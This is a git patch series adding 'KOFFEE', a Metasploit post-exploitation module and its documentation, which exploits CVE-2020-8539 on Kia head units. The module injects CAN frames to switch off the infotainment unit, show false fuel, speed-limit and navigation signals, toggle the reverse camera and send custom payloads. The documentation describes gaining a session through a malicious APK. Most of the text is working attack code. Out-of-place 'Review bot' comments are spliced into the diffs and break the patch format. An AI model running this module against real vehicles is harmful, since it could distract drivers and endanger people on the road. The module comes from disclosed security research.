From 58855af6c62fbc3a5e4e61ec676f6223bb455b96 Mon Sep 17 00:00:00 2001
From: gianpyc
Date: Wed, 7 Apr 2021 05:33:53 -0400
Subject: [PATCH 1/8] KOFFEE first commit. This module exploits the Arbitrary Code Execution vulnerabilty (CVE-2020-8539)
---
 modules/post/android/local/koffee.rb | 240 +++++++++++++++++++++++++++
 1 file changed, 240 insertions(+)
 create mode 100644 modules/post/android/local/koffee.rb
diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb
new file mode 100644
index 0000000000..9ffe51980b
--- /dev/null
+++ b/modules/post/android/local/koffee.rb
@@ -0,0 +1,240 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'readline'
+
+class MetasploitModule < Msf::Post
+ Rank = ExcellentRanking
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'KOFFEE - Kia OFFensivE Exploit',
+ 'Description' => %q{
+ This module exploits CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user to execute the micomd binary file of a Kia Motors vehicle. This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version.
+ This module allows an attacker to send crafted micomd commands that allow the attacker
+ to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
+ },
+ 'Author' =>
+ [
+ 'Gianpiero Costantino',
+ 'Ilaria Matteucci'
+ ],
+ 'References' =>
+ [
+ ['CVE', '2020-8539'],
+ ['URL', 'https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf']
+ ],
+ 'Platform' => 'Android',
+ 'Arch' => [ARCH_ARMLE],
+ 'DisclosureDate' => '2020-12-02',
+ 'Targets' => [[ 'Automatic', {}]],
+ 'DefaultTarget' => 0,
+ 'License' => MSF_LICENSE
+ )
+ )
+ register_options([
+ OptString.new('MICOMD', [true, 'Path to micomd executable', '/system/bin/micomd']),
+ OptString.new('PERIOD', [true, 'Time (ms) interval between two MICOM commands, aka Period of CAN frames', '0.200']),
+ OptInt.new('NUM_MSG', [true, 'Number of MICOM commands sent each time', '5'])
+ ])
+ end
+
+ def send(m_cmd)
+ print_status(' -- Sending Command -- ')
+ cmd = "#{datastore['MICOMD']} -c inject #{m_cmd}"
+ cmd_exec(cmd)
+ end
+
+ def send_out(m_cmd)
+ print_status(' -- Sending Command -- ')
+ cmd = "#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}"
+ cmd_exec(cmd)
+ end
+
+ def send_custom(m_cmd)
+ cmd = "#{datastore['MICOMD']} -c inject #{m_cmd}"
+ var = 0
+ while var < datastore['NUM_MSG'].to_s.to_i
+
cmd_exec(cmd) + var += 1 + print_status("> Sending #{var} out of #{datastore['NUM_MSG']}") + sleep(datastore['PERIOD'].to_s.to_f) + end + end + + def send_out_custom(m_cmd) + cmd = "#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}" + var = 0 + while var < datastore['Num_msg'].to_s.to_i + cmd_exec(cmd) + var += 1 + print_status("> Sending #{var} out of #{datastore['NUM_MSG']}") + sleep(datastore['PERIOD'].to_s.to_f) + end + end + + def run + loop do + print_status(' ') + print_status(" `:+ydmNMMNmhs: + .odMMMMMMMMMMMMMMm` + /dM MMMMMMM MMMMMMM: o` + /mMMM MMMMMM MMMMMMm-`yMs + .dMMMMM MMMMM MMMMMm+ :mMMN + :NMMMMMM MMMM MMMMh/ :hMMMMN + /MMMMMMMM MMM Mmy/`.omMMMMMMy +.NMMMMMMMM my+:`./smMMMMMMMMN. +yMMMMMMNy/ `/shNMMMMMMMMMMMM/ +NMMMMd/`-s MM MMMMMMMMMMMMN: +NMMd- +mMM MMM MMMMMMMMMMd. +sMo :mMMMM MMMM MMMMMMMm/ +`/ oMMMMMM MMMMM MMMMd/ + .NMMMMMM MMMMMM do. + :shmNMMNmdy+:` ") + print_status(' ') + print_status(' -- Welcome, would you like a KOFFEE? --') + print_status(' ') + print_status("Make your choice: + 1. Mute/unmute radio + 2. Reduce radio volume + 3. Radio volume at maximum + 4. Low screen brightness + 5. High screen brightness + 6. Low fuel warning message + 7. Navigation full screen + 8. Set navigation address + 9. Seek down + 10. Seek Up + 11. Switch off Infotainment + 12. Switch On Infotainment + 13. Camera Reverse On + 14. Camera Reverse Off + 15. Inject pre-crafted CAN frames into MM bus + 16. Inject custom command + 0. Exit") + n = Readline.readline('Koffee > ').to_i + break if n.zero? 
+
+ case n
+ when 1
+ send('8351 04')
+ when 2
+ send_out('0112 F4 01')
+ when 3
+ send_out('0112 F0')
+ when 4
+ send('8353 07 01')
+ when 5
+ send('8353 07 00')
+ when 6
+ send('8353 0B 01')
+ when 7
+ send('8350 0C 01')
+ when 8
+ send('8350 0D 03')
+ when 9
+ send_out('133 01')
+ when 10
+ send_out('133 02')
+ when 11
+ send_out('170 00')
+ when 12
+ send_out('170 01')
+ when 13
+ send('8353 03 01')
+ when 14
+ send('8353 03 00')
+ when 15
+ print_status("Select the action:
+ 1. Change cluster language
+ 2. Change speed limit
+ 3. Round about far far far away
+ 4. Random navigation signals
+ 5. Modify radio info
+ 0. Back")
+ s = Readline.readline('Koffee > ').to_i
+ case s
+ when 1
+ print_status(' -- Korean -- ')
+ send_out_custom('4D3 01')
+ print_status(' -- Arabic -- ')
+ send_out_custom('4D3 08')
+ print_status(' -- Polish -- ')
+ send_out_custom('4D3 0E')
+ print_status(' -- Italian -- ')
+ send_out_custom('4D3 12')
+ when 2
+ send_out_custom('4DB 00 0A')
+ send_out_custom('4DB 00 2A')
+ send_out_custom('4DB 00 3A')
+ send_out_custom('4DB 00 5A')
+ send_out_custom('4DB 00 7A')
+ send_out_custom('4DB 00 9A')
+ send_out_custom('4DB 00 AA')
+ send_out_custom('4DB 00 BA')
+ when 3
+ print_status(' -- km -- ')
+ send_out_custom('4D1 66 00 00 00 14 86 10 00')
+ print_status(' -- mi -- ')
+ send_out_custom('4D1 66 00 00 00 14 86 20 00')
+ print_status(' -- ft -- ')
+ send_out_custom('4D1 66 00 00 00 14 86 30 00')
+ print_status(' -- yd -- ')
+ send_out_custom('4D1 66 00 00 00 14 86 40 00')
+ print_status(' -- No distance -- ')
+ send_out_custom('4D1 66 00 00 00 14 86 50 00')
+ when 4
+ print_status(' -- Calculating the route -- ')
+ send_out_custom('4D1 09')
+ print_status(' -- Recalculating the route -- ')
+ send_out_custom('4D1 0A')
+ print_status(' -- Straight ahead -- ')
+ send_out_custom('4D1 0D')
+ print_status(' -- Exit on the Right -- ')
+ send_out_custom('4D1 13')
+ print_status(' -- Exit on the Left -- ')
+ send_out_custom('4D1 14')
+ when 5
+
print_status(' -- USB Music -- ')
+ send_out_custom('4D6 65')
+ print_status(' -- Android Auto -- ')
+ send_out_custom('4D6 6F')
+ print_status(' -- FM 168.17 -- ')
+ send_out_custom('4D6 11 9D 00 00 00 00 5F 83')
+ print_status(' -- FM1 168.17 -- ')
+ send_out_custom('4D6 12 9D 00 00 00 00 5F 83')
+ print_status(' -- FM2 168.17 -- ')
+ send_out_custom('4D6 13 9D 00 00 00 00 5F 83')
+ else
+ print_status('Nothing to do...')
+ end
+ when 16
+ print_status("Type of sending:
+ 1. Inject
+ 2. Inject-outgoing
+ 0. Back")
+ s = Readline.readline('Koffee > ').to_i
+
+ case s
+ when 1
+ print_status('Insert the command (e.g., cmd byte1 byte2 byte3):')
+ cmd = gets.chomp
+ send_custom(cmd)
+ when 2
+ print_status('> Insert the command (e.g., cmd byte1 byte2 byte3):')
+ cmd = gets.chomp
+ send_out_custom(cmd)
+ else
+ print_status('Nothing to do...')
+ end
+ else
+ print_status('Exiting')
+ end
+ end
+ end
+end
From 84babda37d96ddd6afa7961ca76afeb05e280cac Mon Sep 17 00:00:00 2001
From: gianpyc
Date: Fri, 9 Apr 2021 10:45:35 -0400
Subject: [PATCH 2/8] Adding documentation for KOFFEE exploit
---
 .../modules/post/android/local/koffee.md | 82 +++++++++++++++++++
 1 file changed, 82 insertions(+)
 create mode 100644 documentation/modules/post/android/local/koffee.md
diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md
new file mode 100644
index 0000000000..90396bf057
--- /dev/null
+++ b/documentation/modules/post/android/local/koffee.md
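Review bot: `PERIOD` is described as a millisecond interval, but `send_custom` and `send_out_custom` pass it straight to `sleep`, which takes seconds, so the default `'0.200'` is really 200 ms and a user who enters `200` gets a pause of more than three minutes per frame; either word the option in seconds or convert with `sleep(datastore['PERIOD'].to_s.to_f / 1000.0)`. `def send(m_cmd)` redefines `Object#send` on the module instance, a method the framework itself calls on modules, so it needs a module-specific name. `send_out_custom` reads `datastore['Num_msg']` while its sibling reads `'NUM_MSG'`; the datastore lookup tolerates the case difference, but the two should match. Since `NUM_MSG` is an `OptInt`, both `while var < datastore['NUM_MSG'].to_s.to_i` loops can be `datastore['NUM_MSG'].times do |i|`, and `gets.chomp` in the `when 16` branch raises `NoMethodError` when stdin is at EOF because `gets` returns `nil`. The `PERIOD` handling is carried unchanged into the later hunks of this series.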
@@ -0,0 +1,82 @@ +## Vulnerable Application + +KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user to execute the micomd binary with valid payloads on Kia Motors Head Units. +By using KOFFEE an attacker can send crafted micomd commands to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. + +### Vulnerable Head Unit software versions +- SOP.003.30.180703 +- SOP.005.7.181019 +- SOP.007.1.191209 + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `use post/android/local/koffee` +- [ ] `set session 1` +- [ ] `run` + +### What do you need +* An active session with the Head Unit + +## Options +- MICOMD: it contains the path to micomd executable +- NUM_MSG: it expresses the number of MICOM commands sent each time +- PERIOD: it indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames +- SESSION: it referes to the metasploit session number on which this module is run. + +## Scenarios +KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). First, an attacker may create a malicious apk to generate a remote connection with the HU. For instace, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, starts an active session. +At this point, the attacker is able to use the KOFFEE exploit to take control of the HU and inject CAN bus frames into the M-CAN bus of the vehicle. + + +### Usage + +```bach +msf6 > use post/android/local/koffee +msf6 post(android/local/koffee) > set session 1 +session => 1 +msf6 post(android/local/koffee) > run + +[*] +[*] `:+ydmNMMNmhs: + .odMMMMMMMMMMMMMMm` + /dM MMMMMMM MMMMMMM: o` + /mMMM MMMMMM MMMMMMm-`yMs + .dMMMMM MMMMM MMMMMm+ :mMMN + :NMMMMMM MMMM MMMMh/ :hMMMMN + /MMMMMMMM MMM Mmy/`.omMMMMMMy +.NMMMMMMMM my+:`./smMMMMMMMMN. +yMMMMMMNy/ `/shNMMMMMMMMMMMM/ +NMMMMd/`-s MM MMMMMMMMMMMMN: +NMMd- +mMM MMM MMMMMMMMMMd. 
+sMo :mMMMM MMMM MMMMMMMm/ +`/ oMMMMMM MMMMM MMMMd/ + .NMMMMMM MMMMMM do. + :shmNMMNmdy+:` +[*] +[*] -- Welcome, would you like a KOFFEE? -- +[*] +[*] Make your choice: + 1. Mute/unmute radio + 2. Reduce radio volume + 3. Radio volume at maximum + 4. Low screen brightness + 5. High screen brightness + 6. Low fuel warning message + 7. Navigation full screen + 8. Set navigation address + 9. Seek down + 10. Seek Up + 11. Switch off Infotainment + 12. Switch On Infotainment + 13. Camera Reverse On + 14. Camera Reverse Off + 15. Inject pre-crafted CAN frames into MM bus + 16. Inject custom command + 0. Exit +Koffee > 1 +[*] -- Sending Command -- +... +Koffee > 0 +[*] Post module execution completed +``` From e9088cfc120e4f625a63de14d12da9f8198a1ff1 Mon Sep 17 00:00:00 2001 From: gianpyc Date: Mon, 12 Apr 2021 04:13:03 -0400 Subject: [PATCH 3/8] Run rubocop and msftidy_docs, both on the module and documentation --- documentation/modules/post/android/local/koffee.md | 13 +++++++++---- modules/post/android/local/koffee.rb | 5 +++-- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md index 90396bf057..ed708cf8d0 100644 --- a/documentation/modules/post/android/local/koffee.md +++ b/documentation/modules/post/android/local/koffee.md 
@@ -1,7 +1,9 @@ ## Vulnerable Application -KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user to execute the micomd binary with valid payloads on Kia Motors Head Units. -By using KOFFEE an attacker can send crafted micomd commands to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. +KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user +to execute the micomd binary with valid payloads on Kia Motors Head Units. +By using KOFFEE an attacker can send crafted micomd commands to control the head unit and send CAN bus frames +into the Multimedia CAN (M-Can) of the vehicle. ### Vulnerable Head Unit software versions - SOP.003.30.180703 @@ -25,8 +27,11 @@ By using KOFFEE an attacker can send crafted micomd commands to control the head - SESSION: it referes to the metasploit session number on which this module is run. ## Scenarios -KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). First, an attacker may create a malicious apk to generate a remote connection with the HU. For instace, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, starts an active session. -At this point, the attacker is able to use the KOFFEE exploit to take control of the HU and inject CAN bus frames into the M-CAN bus of the vehicle. +KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). +First, an attacker may create a malicious apk to generate a remote connection with the HU. +For instace, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, +starts an active session. Now, the attacker is able to use the KOFFEE exploit to take control of the HU and +inject CAN bus frames into the M-CAN bus of the vehicle. ### Usage 
diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb
index 9ffe51980b..a2f6e19b92 100644
--- a/modules/post/android/local/koffee.rb
+++ b/modules/post/android/local/koffee.rb
@@ -15,8 +15,9 @@ class MetasploitModule < Msf::Post
 info,
 'Name' => 'KOFFEE - Kia OFFensivE Exploit',
 'Description' => %q{
- This module exploits CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user to execute the micomd binary file of a Kia Motors vehicle. This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version.
- This module allows an attacker to send crafted micomd commands that allow the attacker
+ This module exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows an to attacker execute the micomd binary file Kia Motors of Head Unit.
+ This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version.
+ This module, run on an active session, allows an attacker to send crafted micomd commands that allow the attacker
 to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
 },
 'Author' =>
From cffb82e8d963d9a6685716aadf338b722c0426f6 Mon Sep 17 00:00:00 2001
From: gianpyc
Date: Tue, 13 Apr 2021 10:00:12 -0400
Subject: [PATCH 4/8] Updating KOFFEE module enabling actions that can be selected by a user to trigger functionalities on the head unit
---
 modules/post/android/local/koffee.rb | 217 +++++++-------------------
 1 file changed, 55 insertions(+), 162 deletions(-)
diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb
index a2f6e19b92..be301c7a5b 100644
--- a/modules/post/android/local/koffee.rb
+++ b/modules/post/android/local/koffee.rb
@@ -7,7 +7,6 @@
 require 'readline'

 class MetasploitModule < Msf::Post
- Rank = ExcellentRanking

 def initialize(info = {})
 super(
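Review bot: The rewritten first description line reads "allows an to attacker execute the micomd binary file Kia Motors of Head Unit", which has its words scrambled; suggested wording: `This module exploits CVE-2020-8539, an arbitrary code execution vulnerability that allows an attacker to execute the micomd binary on the head unit of Kia Motors vehicles.` The second added line cites "SOP.003.30.18.0703" while the documentation added in the previous patch lists "SOP.003.30.180703"; one of the two is a typo and the module and its doc should agree. Both issues survive into the description hunk of the next patch (`@@ -15,11 +14,12 @@`), which keeps "an to attacker" and the same version string. The `initialize` call this text belongs to starts and ends outside the hunk.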
@@ -15,11 +14,12 @@ class MetasploitModule < Msf::Post
 info,
 'Name' => 'KOFFEE - Kia OFFensivE Exploit',
 'Description' => %q{
- This module exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows an to attacker execute the micomd binary file Kia Motors of Head Unit.
+ This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to attacker execute the micomd binary file on the head unit of Kia Motors.
 This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version.
 This module, run on an active session, allows an attacker to send crafted micomd commands that allow the attacker
 to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
 },
+ 'SessionTypes' => ['meterpreter'],
 'Author' =>
 [
 'Gianpiero Costantino',
@@ -30,31 +30,39 @@ class MetasploitModule < Msf::Post
 ['CVE', '2020-8539'],
 ['URL', 'https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf']
 ],
+ 'Actions' => [
+ [ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/umutes the radio' } ],
+ [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It reduces radio volume' } ],
+ [ 'MAX_RADIO_VOLUME', { 'Description' => 'It sets the radio volume to the max' } ],
+ [ 'CHANGE_CLUSTER_LANGUAGE', { 'Description' => 'It changes the cluster language' } ],
+ [ 'INJECT_CUSTOM', { 'Description' => 'It injects custom micom payloads' } ]
+ ],
+ 'DefaultAction' => 'TOGGLE_RADIO_MUTE',
 'Platform' => 'Android',
- 'Arch' => [ARCH_ARMLE],
 'DisclosureDate' => '2020-12-02',
- 'Targets' => [[ 'Automatic', {}]],
- 'DefaultTarget' => 0,
 'License' => MSF_LICENSE
 )
 )
 register_options([
 OptString.new('MICOMD', [true, 'Path to micomd executable', '/system/bin/micomd']),
 OptString.new('PERIOD', [true, 'Time (ms) interval between two MICOM commands, aka Period of CAN frames', '0.200']),
- OptInt.new('NUM_MSG', [true, 'Number of MICOM commands sent each time', '5'])
+ OptInt.new('NUM_MSG', [true, 'Number of MICOM commands sent each time', '5']),
+ OptString.new('CMD_PAYLOAD', [ false, 'Micom payload to inject, e.g., cmd byte1 byte3 byte2', '00 00 00'], conditions: %w[ACTION == INJECT_CUSTOM]),
 ])
 end

- def send(m_cmd)
+ def send_in(m_cmd)
 print_status(' -- Sending Command -- ')
 cmd = "#{datastore['MICOMD']} -c inject #{m_cmd}"
 cmd_exec(cmd)
+ print_good(' -- Command Sent-- ')
 end

 def send_out(m_cmd)
 print_status(' -- Sending Command -- ')
 cmd = "#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}"
 cmd_exec(cmd)
+ print_good(' -- Command Sent-- ')
 end

 def send_custom(m_cmd)
@@ -66,6 +74,7 @@ class MetasploitModule < Msf::Post
 print_status("> Sending #{var} out of #{datastore['NUM_MSG']}")
 sleep(datastore['PERIOD'].to_s.to_f)
 end
+ print_good(' -- Custom payload Sent-- ')
 end

 def send_out_custom(m_cmd)
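Review bot: `send_in` and `send_out` now print `' -- Command Sent-- '` unconditionally, but the value returned by `cmd_exec(cmd)` is discarded, so the success line says nothing about whether micomd actually ran or what it reported; keep the output, e.g. `out = cmd_exec(cmd)` followed by `vprint_status(out) unless out.blank?`, so a failing binary is visible in verbose mode. The `CMD_PAYLOAD` description gives its example as `cmd byte1 byte3 byte2`, which reads like a slip for `cmd byte1 byte2 byte3` (the documentation repeats the same text). The missing space in `' -- Command Sent-- '` is also inconsistent with the other status strings, and the following hunk `@@ -66,6 +74,7 @@` adds `' -- Custom payload Sent-- '` with the same slip.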
@@ -77,165 +86,49 @@ class MetasploitModule < Msf::Post print_status("> Sending #{var} out of #{datastore['NUM_MSG']}") sleep(datastore['PERIOD'].to_s.to_f) end + print_good(' -- CAN bus frames sent-- ') end def run - loop do - print_status(' ') - print_status(" `:+ydmNMMNmhs: - .odMMMMMMMMMMMMMMm` - /dM MMMMMMM MMMMMMM: o` - /mMMM MMMMMM MMMMMMm-`yMs - .dMMMMM MMMMM MMMMMm+ :mMMN - :NMMMMMM MMMM MMMMh/ :hMMMMN - /MMMMMMMM MMM Mmy/`.omMMMMMMy -.NMMMMMMMM my+:`./smMMMMMMMMN. -yMMMMMMNy/ `/shNMMMMMMMMMMMM/ -NMMMMd/`-s MM MMMMMMMMMMMMN: -NMMd- +mMM MMM MMMMMMMMMMd. -sMo :mMMMM MMMM MMMMMMMm/ -`/ oMMMMMM MMMMM MMMMd/ - .NMMMMMM MMMMMM do. - :shmNMMNmdy+:` ") - print_status(' ') - print_status(' -- Welcome, would you like a KOFFEE? --') - print_status(' ') - print_status("Make your choice: - 1. Mute/unmute radio - 2. Reduce radio volume - 3. Radio volume at maximum - 4. Low screen brightness - 5. High screen brightness - 6. Low fuel warning message - 7. Navigation full screen - 8. Set navigation address - 9. Seek down - 10. Seek Up - 11. Switch off Infotainment - 12. Switch On Infotainment - 13. Camera Reverse On - 14. Camera Reverse Off - 15. Inject pre-crafted CAN frames into MM bus - 16. Inject custom command - 0. Exit") - n = Readline.readline('Koffee > ').to_i - break if n.zero? + # all conditional options are required when active, make sure none of them are blank + options.each_pair do |name, option| + next if option.conditions.empty? 
+ next unless Msf::OptCondition.show_option(self, option) - case n - when 1 - send('8351 04') - when 2 - send_out('0112 F4 01') - when 3 - send_out('0112 F0') - when 4 - send('8353 07 01') - when 5 - send('8353 07 00') - when 6 - send('8353 0B 01') - when 7 - send('8350 0C 01') - when 8 - send('8350 0D 03') - when 9 - send_out('133 01') - when 10 - send_out('133 02') - when 11 - send_out('170 00') - when 12 - send_out('170 01') - when 13 - send('8353 03 01') - when 14 - send('8353 03 00') - when 15 - print_status("Select the action: - 1. Change cluster language - 2. Change speed limit - 3. Round about far far far away - 4. Random navigation signals - 5. Modify radio info - 0. Back") - s = Readline.readline('Koffee > ').to_i - case s - when 1 - print_status(' -- Korean -- ') - send_out_custom('4D3 01') - print_status(' -- Arabic -- ') - send_out_custom('4D3 08') - print_status(' -- Polish -- ') - send_out_custom('4D3 0E') - print_status(' -- Italian -- ') - send_out_custom('4D3 12') - when 2 - send_out_custom('4DB 00 0A') - send_out_custom('4DB 00 2A') - send_out_custom('4DB 00 3A') - send_out_custom('4DB 00 5A') - send_out_custom('4DB 00 7A') - send_out_custom('4DB 00 9A') - send_out_custom('4DB 00 AA') - send_out_custom('4DB 00 BA') - when 3 - print_status(' -- km -- ') - send_out_custom('4D1 66 00 00 00 14 86 10 00') - print_status(' -- mi -- ') - send_out_custom('4D1 66 00 00 00 14 86 20 00') - print_status(' -- ft -- ') - send_out_custom('4D1 66 00 00 00 14 86 30 00') - print_status(' -- yd -- ') - send_out_custom('4D1 66 00 00 00 14 86 40 00') - print_status(' -- No distance -- ') - send_out_custom('4D1 66 00 00 00 14 86 50 00') - when 4 - print_status(' -- Calculating the route -- ') - send_out_custom('4D1 09') - print_status(' -- Recalculating the route -- ') - send_out_custom('4D1 0A') - print_status(' -- Straight ahead -- ') - send_out_custom('4D1 0D') - print_status(' -- Exit on the Right -- ') - send_out_custom('4D1 13') - print_status(' -- Exit on the 
Left -- ')
- send_out_custom('4D1 14')
- when 5
- print_status(' -- USB Music -- ')
- send_out_custom('4D6 65')
- print_status(' -- Android Auto -- ')
- send_out_custom('4D6 6F')
- print_status(' -- FM 168.17 -- ')
- send_out_custom('4D6 11 9D 00 00 00 00 5F 83')
- print_status(' -- FM1 168.17 -- ')
- send_out_custom('4D6 12 9D 00 00 00 00 5F 83')
- print_status(' -- FM2 168.17 -- ')
- send_out_custom('4D6 13 9D 00 00 00 00 5F 83')
- else
- print_status('Nothing to do...')
- end
- when 16
- print_status("Type of sending:
- 1. Inject
- 2. Inject-outgoing
- 0. Back")
- s = Readline.readline('Koffee > ').to_i
-
- case s
- when 1
- print_status('Insert the command (e.g., cmd byte1 byte2 byte3):')
- cmd = gets.chomp
- send_custom(cmd)
- when 2
- print_status('> Insert the command (e.g., cmd byte1 byte2 byte3):')
- cmd = gets.chomp
- send_out_custom(cmd)
- else
- print_status('Nothing to do...')
- end
- else
- print_status('Exiting')
- end
+ fail_with(Failure::BadConfig, "The #{name} option is required by the #{action.name} action.") if datastore[name].blank?
 end
+ print_status(' -- Starting action -- ')
+ send("action_#{action.name.downcase}")
+ end
+
+ def action_toggle_radio_mute
+ print_status(' -- Mute/umute radio -- ')
+ send_in('8351 04')
+ end
+
+ def action_reduce_radio_volume
+ print_status(' -- Reduce radio volume -- ')
+ send_out('0112 F4 01')
+ end
+
+ def action_max_radio_volume
+ print_status(' -- Max radio volume -- ')
+ send_out('0112 F0')
+ end
+
+ def action_change_cluster_language
+ print_status(' -- Korean -- ')
+ send_out_custom('4D3 01')
+ print_status(' -- Arabic -- ')
+ send_out_custom('4D3 08')
+ print_status(' -- Polish -- ')
+ send_out_custom('4D3 0E')
+ print_status(' -- Italian -- ')
+ send_out_custom('4D3 12')
+ end
+
+ def action_inject_custom
+ print_status(" -- Injecting custom payload (#{datastore['CMD_PAYLOAD']}) -- ")
+ send_custom(datastore['CMD_PAYLOAD'])
 end
 end
From c4956ce19b3d5358e2a240d042e6dbbcbe5b1c47 Mon Sep 17 00:00:00 2001
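Review bot: `run` dispatches to the action after checking only that conditional options are non-blank; it never confirms that `datastore['MICOMD']` exists on the session, so on a device without the binary every action still prints its "Command Sent" success line after a `cmd_exec` that ran nothing. A guard before the dispatch such as `fail_with(Failure::NotFound, "#{datastore['MICOMD']} not found on target") unless file?(datastore['MICOMD'])` would make that explicit (`file?` comes from `Msf::Post::File`, which the module would need to include). `CMD_PAYLOAD` is interpolated into the shell line unchanged, so for `INJECT_CUSTOM` it is worth rejecting anything that is not the documented `cmd byte byte ...` shape, e.g. `fail_with(Failure::BadConfig, 'CMD_PAYLOAD must be hex words separated by spaces') unless datastore['CMD_PAYLOAD'].to_s.match?(/\A\h+(\s\h{2})*\z/)`. The `send("action_#{action.name.downcase}")` dispatch is fine as written, since `action.name` can only take values from the `Actions` table. The `run` method starts outside this hunk.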
From: gianpyc Date: Fri, 16 Apr 2021 04:54:29 -0400 Subject: [PATCH 5/8] Updatied the module with the full set of actions --- .../modules/post/android/local/koffee.md | 83 +++++++++---------- modules/post/android/local/koffee.rb | 74 +++++++++++++++-- 2 files changed, 108 insertions(+), 49 deletions(-) diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md index ed708cf8d0..f5d27ff59e 100644 --- a/documentation/modules/post/android/local/koffee.md +++ b/documentation/modules/post/android/local/koffee.md @@ -15,7 +15,7 @@ into the Multimedia CAN (M-Can) of the vehicle. - [ ] Start `msfconsole` - [ ] `use post/android/local/koffee` - [ ] `set session 1` -- [ ] `run` +- [ ] `toogle_radio_mute` or `run` ### What do you need * An active session with the Head Unit 
@@ -25,6 +25,40 @@ into the Multimedia CAN (M-Can) of the vehicle. - NUM_MSG: it expresses the number of MICOM commands sent each time - PERIOD: it indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames - SESSION: it referes to the metasploit session number on which this module is run. +- CMD_PAYLOAD: It refers to the Micom payload to be injected, e.g., cmd byte1 byte3 byte2'. +By default it is set to `00 00 00`. This options works only for the `INJECT_CUSTOM` action + +## Actions + +The following actions can be triggered on the Head Unit. An action can be triggerd by inserting in the +metasploit input console the action name in lowercase, e.g., camera_reverse_off. + +- CAMERA_REVERSE_OFF: It hides the parking camera video stream +- CAMERA_REVERSE_ON: It shows the parking camera video stream +- CHANGE_CLUSTER_LANGUAGE: It changes the cluster language +- HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness +- INJECT_CUSTOM: It injects custom micom payloads +- LOW_FUEL_WARNING: It pops up a low fuel message on the head unit +- LOW_SCREEN_BRIGHTNESS: It decreses the head unit screen brightness +- MAX_RADIO_VOLUME: It sets the radio volume to the max + - NAVIGATION_FULL_SCREEN: It pops up the nagitaion app +- REDUCE_RADIO_VOLUME: It reduces radio volume +- SEEK_DOWN_SEARCH: It triggers the seek down radio frequency search +- SEEK_UP_SEARCH: It triggers the seek up radio frequency search +- SET_NAVIGATION_ADDRESS: It pops up the nagitaion address window +- SWITCH_OFF_Hu: It switches off the head unit +- SWITCH_ON_Hu: It switches on the head unit + - TOGGLE_RADIO_MUTE It mutes/umutes the radio + +An action can be also triggered using the commands: +- [ ] `set action CAMERA_REVERSE_ON` +- [ ] `run` + +To execute the `INJECT_CUSTOM` action, you may want also to set up the right payload. 
+The commands to use to trigger this action are +- [ ] `set action INJECT_CUSTOM` +- [ ] `set CMD_PAYLOAD 01 FF` +- [ ] `run` ## Scenarios KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). @@ -40,48 +74,9 @@ inject CAN bus frames into the M-CAN bus of the vehicle. msf6 > use post/android/local/koffee msf6 post(android/local/koffee) > set session 1 session => 1 -msf6 post(android/local/koffee) > run +msf6 post(android/local/koffee) > toggle_radio_mute -[*] -[*] `:+ydmNMMNmhs: - .odMMMMMMMMMMMMMMm` - /dM MMMMMMM MMMMMMM: o` - /mMMM MMMMMM MMMMMMm-`yMs - .dMMMMM MMMMM MMMMMm+ :mMMN - :NMMMMMM MMMM MMMMh/ :hMMMMN - /MMMMMMMM MMM Mmy/`.omMMMMMMy -.NMMMMMMMM my+:`./smMMMMMMMMN. -yMMMMMMNy/ `/shNMMMMMMMMMMMM/ -NMMMMd/`-s MM MMMMMMMMMMMMN: -NMMd- +mMM MMM MMMMMMMMMMd. -sMo :mMMMM MMMM MMMMMMMm/ -`/ oMMMMMM MMMMM MMMMd/ - .NMMMMMM MMMMMM do. - :shmNMMNmdy+:` -[*] -[*] -- Welcome, would you like a KOFFEE? -- -[*] -[*] Make your choice: - 1. Mute/unmute radio - 2. Reduce radio volume - 3. Radio volume at maximum - 